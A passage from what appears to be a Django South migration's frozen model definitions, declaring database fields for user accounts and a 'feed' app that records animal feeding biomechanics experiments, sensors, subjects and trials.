'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'feed.ageunit': {
'Meta': {'ordering': "['label']", 'object_name': 'AgeUnit'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'ageunit_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.anatomicallocation': {
'Meta': {'ordering': "['label']", 'object_name': 'AnatomicalLocation'},
'category': ('django.db.models.fields.IntegerField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'anatomicallocation_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.anteriorposterioraxis': {
'Meta': {'object_name': 'AnteriorPosteriorAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'anteriorposterioraxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.behavior': {
'Meta': {'ordering': "['label']", 'object_name': 'Behavior'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'behavior_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.behaviorowl': {
'Meta': {'object_name': 'BehaviorOwl'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'obo_definition': ('django.db.models.fields.TextField', [], {}),
'rdfs_comment': ('django.db.models.fields.TextField', [], {}),
'rdfs_subClassOf_ancestors': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['feed.BehaviorOwl']", 'symmetrical': 'False'}),
'uri': ('django.db.models.fields.CharField', [], {'max_length': '1500'})
},
u'feed.channel': {
'Meta': {'object_name': 'Channel'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'channel_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'rate': ('django.db.models.fields.IntegerField', [], {}),
'setup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Setup']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.channellineup': {
'Meta': {'ordering': "['position']", 'object_name': 'ChannelLineup'},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Channel']", 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'channellineup_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Session']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.depthaxis': {
'Meta': {'object_name': 'DepthAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'depthaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.developmentstage': {
'Meta': {'ordering': "['label']", 'object_name': 'DevelopmentStage'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'developmentstage_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.dorsalventralaxis': {
'Meta': {'object_name': 'DorsalVentralAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dorsalventralaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.electrodetype': {
'Meta': {'ordering': "['label']", 'object_name': 'ElectrodeType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'electrodetype_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.emgchannel': {
'Meta': {'object_name': 'EmgChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'emg_amplification': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'emg_filtering': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Emgfiltering']"}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.EmgSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']"})
},
u'feed.emgfiltering': {
'Meta': {'ordering': "['label']", 'object_name': 'Emgfiltering'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'emgfiltering_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.emgsensor': {
'Meta': {'ordering': "['id']", 'object_name': 'EmgSensor', '_ormbases': [u'feed.Sensor']},
'axisdepth': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DepthAxis']", 'null': 'True', 'blank': 'True'}),
'electrode_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.ElectrodeType']", 'null': 'True', 'blank': 'True'}),
'location_controlled': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AnatomicalLocation']"}),
'muscle': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.MuscleOwl']", 'null': 'True'}),
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.emgsetup': {
'Meta': {'object_name': 'EmgSetup', '_ormbases': [u'feed.Setup']},
'preamplifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.eventchannel': {
'Meta': {'object_name': 'EventChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'feed.eventsetup': {
'Meta': {'object_name': 'EventSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.experiment': {
'Meta': {'object_name': 'Experiment'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'experiment_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impl_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Study']"}),
'subj_age': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '19', 'decimal_places': '5', 'blank': 'True'}),
'subj_ageunit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AgeUnit']", 'null': 'True', 'blank': 'True'}),
'subj_devstage': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DevelopmentStage']"}),
'subj_tooth': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'subj_weight': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '19', 'decimal_places': '5', 'blank': 'True'}),
'subject': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Subject']"}),
'subject_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.forcechannel': {
'Meta': {'object_name': 'ForceChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.ForceSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.forcesensor': {
'Meta': {'object_name': 'ForceSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.forcesetup': {
'Meta': {'object_name': 'ForceSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.illustration': {
'Meta': {'object_name': 'Illustration'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'illustration_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Experiment']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'picture': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'setup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Setup']", 'null': 'True', 'blank': 'True'}),
'subject': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Subject']", 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.kinematicschannel': {
'Meta': {'object_name': 'KinematicsChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.KinematicsSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.kinematicssensor': {
'Meta': {'object_name': 'KinematicsSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.kinematicssetup': {
'Meta': {'object_name': 'KinematicsSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.mediallateralaxis': {
'Meta': {'object_name': 'MedialLateralAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'mediallateralaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.muscleowl': {
'Meta': {'object_name': 'MuscleOwl'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'obo_definition': ('django.db.models.fields.TextField', [], {}),
'rdfs_comment': ('django.db.models.fields.TextField', [], {}),
'rdfs_subClassOf_ancestors': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['feed.MuscleOwl']", 'symmetrical': 'False'}),
'uri': ('django.db.models.fields.CharField', [], {'max_length': '1500'})
},
u'feed.pressurechannel': {
'Meta': {'object_name': 'PressureChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.PressureSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.pressuresensor': {
'Meta': {'object_name': 'PressureSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.pressuresetup': {
'Meta': {'object_name': 'PressureSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.proximaldistalaxis': {
'Meta': {'object_name': 'ProximalDistalAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'proximaldistalaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.restraint': {
'Meta': {'ordering': "['label']", 'object_name': 'Restraint'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'restraint_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.sensor': {
'Meta': {'object_name': 'Sensor'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'sensor_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loc_ap': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AnteriorPosteriorAxis']", 'null': 'True', 'blank': 'True'}),
'loc_dv': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DorsalVentralAxis']", 'null': 'True', 'blank': 'True'}),
'loc_ml': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.MedialLateralAxis']", 'null': 'True', 'blank': 'True'}),
'loc_pd': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.ProximalDistalAxis']", 'null': 'True', 'blank': 'True'}),
'loc_side': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Side']"}),
'location_freetext': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'setup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Setup']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.session': {
'Meta': {'ordering': "['position']", 'object_name': 'Session'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'channels': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['feed.Channel']", 'through': u"orm['feed.ChannelLineup']", 'symmetrical': 'False'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'session_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Experiment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'subj_anesthesia_sedation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'subj_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'subj_restraint': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Restraint']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.setup': {
'Meta': {'object_name': 'Setup'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'setup_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Experiment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'sampling_rate': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'technique': ('django.db.models.fields.IntegerField', [], {}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.side': {
'Meta': {'ordering': "['label']", 'object_name': 'Side'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'side_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.sonochannel': {
'Meta': {'object_name': 'SonoChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'crystal1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'crystals1_related'", 'to': u"orm['feed.SonoSensor']"}),
'crystal2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'crystals2_related'", 'to': u"orm['feed.SonoSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']"})
},
u'feed.sonosensor': {
'Meta': {'object_name': 'SonoSensor', '_ormbases': [u'feed.Sensor']},
'axisdepth': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DepthAxis']", 'null': 'True', 'blank': 'True'}),
'location_controlled': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AnatomicalLocation']"}),
'muscle': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.MuscleOwl']", 'null': 'True'}),
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.sonosetup': {
'Meta': {'object_name': 'SonoSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'}),
'sonomicrometer': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'feed.strainchannel': {
'Meta': {'object_name': 'StrainChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.StrainSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']", 'null': 'True'})
},
u'feed.strainsensor': {
'Meta': {'object_name': 'StrainSensor', '_ormbases': [u'feed.Sensor']},
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.strainsetup': {
'Meta': {'object_name': 'StrainSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.study': {
'Meta': {'ordering': "['title']", 'object_name': 'Study'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'approval_secured': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'study_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'funding_agency': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resources': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.studyprivate': {
'Meta': {'object_name': 'StudyPrivate'},
'approval': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'studyprivate_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'funding': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lab': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'organization': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'pi': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Study']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.subject': {
'Meta': {'object_name': 'Subject'},
'breed': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subject_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Study']"}),
'taxon': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Taxon']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.taxon': {
'Meta': {'ordering': "['genus']", 'object_name': 'Taxon'},
'common_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'taxon_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'genus': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'species': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.trial': {
'Meta': {'object_name': 'Trial'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'behavior_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'behavior_primary': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Behavior']"}),
'behavior_secondary': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'trial_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'data_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'estimated_duration': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'food_property': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'food_size': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'food_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Session']"}),
